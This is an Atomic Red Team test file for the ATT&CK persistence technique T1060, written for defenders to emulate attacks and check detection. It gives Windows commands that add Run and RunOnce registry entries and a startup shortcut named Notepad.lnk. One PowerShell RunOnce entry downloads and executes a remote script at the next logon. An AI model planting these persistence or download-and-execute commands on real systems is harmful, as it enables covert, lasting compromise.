security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
fc495c1192fda69bd1ed33a13d7590ef055eee09
atomic-red-team/atomics/T1060/T1060.md
T
caseysmithrc e8b1650db6 yamlize
2018-05-24 08:13:57 -06:00

106 lines
4.1 KiB
Markdown
Raw Blame History

# T1060 - Registry Run Keys / Start Folder
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1060)
<blockquote>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) The program will be executed under the context of the user and will have the account's associated permissions level.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
Detection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.
Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Platforms: Windows
Data Sources: Windows Registry, File monitoring
Permissions Required: User, Administrator</blockquote>
## Atomic Tests
- [Atomic Test #1 - Reg Key Run](#atomic-test-1---reg-key-run)
- [Atomic Test #2 - Reg Key RunOnce](#atomic-test-2---reg-key-runonce)
- [Atomic Test #3 - PowerShell Registry RunOnce](#atomic-test-3---powershell-registry-runonce)
- [Atomic Test #4 - Startup Folder](#atomic-test-4---startup-folder)
<br/>
## Atomic Test #1 - Reg Key Run
Run Key Persistence
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
#### Run it with `command_prompt`!
```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
```
<br/>
<br/>
## Atomic Test #2 - Reg Key RunOnce
RunOnce Key Persistence
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
#### Run it with `command_prompt`!
```
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
```
<br/>
<br/>
## Atomic Test #3 - PowerShell Registry RunOnce
RunOnce Key Persistence via PowerShell
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
#### Run it with `powershell`!
```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
```
<br/>
<br/>
## Atomic Test #4 - Startup Folder
Add Shortcut To Startup via PowerShell
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
#### Run it with `powershell`!
```
$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()
```
<br/>
Reference in New Issue View Git Blame Copy Permalink